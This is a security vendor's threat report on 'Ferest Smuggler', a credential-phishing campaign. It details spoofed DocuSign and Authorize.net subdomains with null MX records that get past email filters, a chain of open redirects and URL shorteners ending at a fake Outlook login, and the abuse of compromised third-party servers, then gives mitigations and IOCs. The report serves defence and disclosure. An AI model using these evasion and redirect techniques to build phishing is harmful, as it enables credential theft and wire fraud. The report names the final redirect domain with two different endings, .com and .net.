Cyberuptive Identifies and Disrupts Ferest Smuggler — A Mass Credential Harvesting Campaign
As more and more organizations secure their enterprises with multi-factor authentication (MFA), adversaries scale and automate to more efficiently harvest — and then exploit — the passwords of those organizations without MFA.
One of those scaled credential harvesting campaigns that Cyberuptive discovered, and then disrupted, is what we call Ferest Smuggler. Email account credentials are a means to an end, and in this case Cyberuptive has high confidence that Ferest Smuggler’s ultimate purpose is business email compromise (BEC)-leveraged wire fraud¹.
Cyberuptive identified key infrastructure of this malicious campaign, including a QuickBooks add-on developer whose server infrastructure was compromised and used to host the fake login pages and credential stealing code. We contacted that company who then ejected the adversary and their code, disrupting the campaign in its tracks. We also shared indicators with a large email cybersecurity service. We are publishing the information in this post to bring attention to this campaign, so others can better detect the next one. We also hope to pose a significant cost on the adversary in their efforts to retool and rebuild their infrastructure.
Let’s dig into screenshots of what Ferest Smuggler malicious emails look like when they arrive in a target’s inbox. Our first example targeted a Midwest US non-profit (Figure 1) in early July 2023.
The attachment is a hypertext markup language (HTML) file with .htm extension, named using the target email domain, some random numbers, and the email user (in this case hrd — short for human resources department). “See attached as discussed previously” is the minimal body text that suffices for social engineering. Note the purported sender domain “maildev.docusign.net.”
A second example phishing email targeted a live entertainment company in the United Kingdom a few weeks later (Figure 2).
Again some minimal, and here grammatically questionable social engineering text “See attached as per what we discussed on this last month.” Note the purported sender domain “stage.partner.docusign.net.”
While docusign.net is a legitimate domain associated with the well-known electronic agreement company, the secondary domain maildev and tertiary domain stage.partner used in the two email examples are likely entirely crafted or chosen by the adversary for a reason. Certainly they may appear valid to the recipient. These subdomains, though purporting to be associated with the real Docusign, do not currently resolve for authenticated mail exchange (MX) records that would otherwise tell receiving email servers that they are legitimate email domains for Docusign. However, due in part to industry accommodations for exceptions and errors in MX authentication configurations, spoofed sender email domains such as these with null MX records are significantly more likely to pass through email filters than spoofed senders purporting to be from domains (such as the primary domain docusign.net) with valid, authenticated MX records. Cyberuptive also observed the following Ferest Smuggler phishing email that targeted a US West Coast city government in August 2023. This email spoofed the Visa-owned payment processor Authorize.net, successfully bypassing email filtering using a domain with null MX records:
From: Auto-Receipt <redacted> <transactionshKCz6RrfM@invoice.authorize\.net>
Date: August 1, 2023 at 8:58:17 PM PDT
To: <Re Dacted><redacted@redacted.org>
Subject: Transaction Receipt for $35,000.00 (USD)
Reply-To: unsubscribe@993629.cox\.net [fake]
Attachment filename: <Redacted>_Receipt_#649846.docx.htm
SHA256: afa7e192bf8ecfa51aa014b88f1abdb1cc249da7014ea662c73ec73297843f89
Attachment filetype: text/html
We assess that the adversary has likely used this technique to achieve more success than their previous credential stealing campaigns. The nearly 400 Ferest Smuggler email attachments Cyberuptive observed in our investigation is evidence that this sub-domain technique is fairly effective in bypassing popular email spoofing filter technologies.
Ferest Smuggler Abuses Podcast Site and QuickBooks Add-On Developer Servers
Cyberuptive performed dynamic analysis on a large number of Ferest Smuggler email attachments and identified infrastructure used by the Ferest Smuggler adversaries to steal credentials. Although the infrastructure varied among phishing waves between June and August 2023, the very first attachment we analyzed shows infrastructure typical of Ferest Smuggler. This attachment targeted a medium sized engineering and architectural firm. The top of Figure 3 shows the initial abuse of an open redirect vulnerability on the legitimate website podcastone.com, and annotations show the redirect targets.
Next, the victim’s browser was redirected to a URL hosted by the free URL shortener site rb.gy, which in turn redirected to yet another free URL shortener at alturl.com (Figure 4).
The alturl.com URL redirected to a URL served by the popular social media site LinkedIn’s own URL shortener, lnkd.in (Figure 5).
The LinkedIn short URL redirected to a site hosted on a server in Iran, vip28sh.mizbanfadns\.com (Figure 6).
Finally, the last redirect from the site hosted in Iran, lands the target’s browser on infrastructure compromised and abused by the adversary to deliver a fake Outlook/Office 365 email login page (Figure 7).
When the victim types their password in the fake Outlook login page, the credentials are POSTed (uploaded) to the adversary’s phishing page “owa.php” (Figure 8).
The victim company hosting Ferest Smuggler’s phishing pages develops QuickBooks add-ons for their customers using custom-named virtual servers. Cyberuptive identified approximately a dozen customer virtual servers with malicious code that was used over a period of several months to steal credentials. The QuickBooks add-on developer expressed that they were not aware of the identified malicious credential stealing files prior to contact by Cyberuptive. The senior web developer rapidly located and removed the malicious files and assured Cyberuptive that the intrusion vector the adversary used to initially compromise their infrastructure was remediated. Cyberuptive confirmed the previously identified malcode was removed as of 15 August 2023. Prior to remediation, Cyberuptive screen recorded our dynamic analysis of one of Ferest Smuggler’s phishing attachments, redacted where necessary to protect the identity of the target recipient (Figure 9).
Why Ferest Smuggler?
Ferest means “to send” in Persian, and is a fitting name for infrastructure that sends its target from one site to another, smuggled inside an HTML attachment. However, Cyberuptive assesses that Ferest Smuggler uses infrastructure in Iran only because Iran represents a hurdle for takedown efforts by Ferest Smuggler’s principle targets in Western nations.
Some of the code analyzed by Cyberuptive suggests association with Nigeria. For example, the Ferest Smuggler phishing code uses the words “salewa” and “asaro” (Figure 10).
Salewa is the name of a village in the northwest Sokoto region of Nigeria. Asaro is the name for a type of yam porridge that is a staple cuisine in Nigeria.
While hunting for some of the unique strings found in Ferest Smuggler’s .htm attachments on VirusTotal, Cyberuptive identified a number of .htm files with placeholder target email addresses. In hundreds of other Ferest Smuggler .htm files, the target email address is clearly specified, yet these attachments were different (Figure 11).
So from where were those apparent test Ferest Smuggler files uploaded to VirusTotal? Let’s save that for another post where we plan to go into more details on the developer behind Ferest Smuggler’s “zero-detection” phishing attachment.
Don’t hesitate to contact Cyberuptive for more indicators of compromise, Yara signatures, and a list of hashes of hundreds of zero-detection phishing attachments attributed to Ferest Smuggler (Figure 12).
Mitigations
There are multiple mitigations for credential phishing in campaigns like Ferest Smuggler. MFA goes almost without saying, however, MFA (especially simple push) can and will eventually be defeated by determined adversaries using, say, social engineering or push fatigue techniques. Cyberuptive recommends strengthening MFA using number matching.
- Employ and enforce MFA with number matching.
- Employ perimeter-based URL or DNS-based categorization filtering technologies.
- Consider implementing zero trust architecture (ZTA) with controls and regimes commensurate with your organization’s risk tolerance. Cyberuptive recommends CloudFlare’s ZTA platform because of its performance and scaffolded approach.
Indicators of Compromise (IOCs)
Ferest Smuggler email relays:
122.17.145\.111
122.17.145\.113
Final redirect site:
vip28sh.mizbanfadns\.net
[1] An email address, and password unprotected by MFA is all it takes for a business email compromise (BEC) fraudster AKA BECster to collect all the email from a staffer’s Microsoft 365 inbox. If that stolen email inbox is associated with a staffer in the accounting or human resources (HR) department, the BECster now has a large number of targets to chose from, all extracted from entities the BECster finds in the stolen email. The BECster can pretend to be the accounts receivable of the original victim organization and target each client, company, or partner identified in that stolen corpus of email that would normally wire money to the original victim organization. And in the case of an HR staffer compromise, the BECster can pretend to be an employee wishing to change their payroll direct deposit, or, even socially engineer a bank with wire diversion.
